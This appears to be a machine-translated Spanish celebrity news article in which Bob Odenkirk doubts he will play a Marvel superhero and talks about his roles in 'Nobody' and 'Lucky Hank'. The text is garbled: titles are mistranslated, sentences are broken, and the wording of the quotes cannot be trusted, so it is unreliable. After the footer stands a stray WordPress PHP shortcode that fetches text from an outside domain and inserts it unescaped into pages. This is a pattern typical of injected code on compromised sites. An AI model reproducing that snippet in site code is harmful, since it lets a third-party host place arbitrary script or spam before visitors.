Bob Odenkirk Pasó de ser un escritor y actor secundario a una importante estrella de cine y televisión, comenzando con su papel de captura de pantalla. Breaking BadLo que llevó a AMC a darle su propia serie. Mejor llamar a Sauly ahora un nuevo programa en cabler titulado madeja de la suerte. Odenkirk ha sido contratado para desempeñar el papel principal en el thriller de acción. Nadie., y ha llevado a algunos a preguntarse si alguna vez lo veremos asumir un papel de superhéroe. ¿Podríamos algún día ver a Odenkirk en el UCM? El actor piensa que tal vez no.


Como él dijo gratis En una entrevista reciente:



“Siempre me gusta mantener las cosas en tierra, relatables y pequeñas. No creo que esté hecho para ese mundo. Estoy hecho para personajes que te hacen sentir como el vecino de al lado”.



En cuanto a él. Nadie. El personaje, Hitch Mansell, dice, Odenkirk incluso piensa que es un tipo con los pies en la tierra que no compararías con un superhéroe. Él explicó:



“(Hutch) sigue siendo un hombre de familia, pero su relación con la violencia es diferente. Ha cambiado, pero tiene un largo camino por recorrer para encontrar el verdadero equilibrio en la forma en que vive su vida”.



El actor siente pasión por el personaje que está repitiendo en la próxima secuela. Añadió:



“Me importa más de lo que puedes imaginar. Crees que esta es una historia personal de mi vida, no una película de acción.



Es bueno que Odenkirk esté tan metido en sus personajes. Su dedicación es claramente parte de la razón por la que le ha ido tan bien en su carrera como actriz. Compruébalo por dentro ahora madeja de la suerte Domingos en AMC.


Por: fecha límite


Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');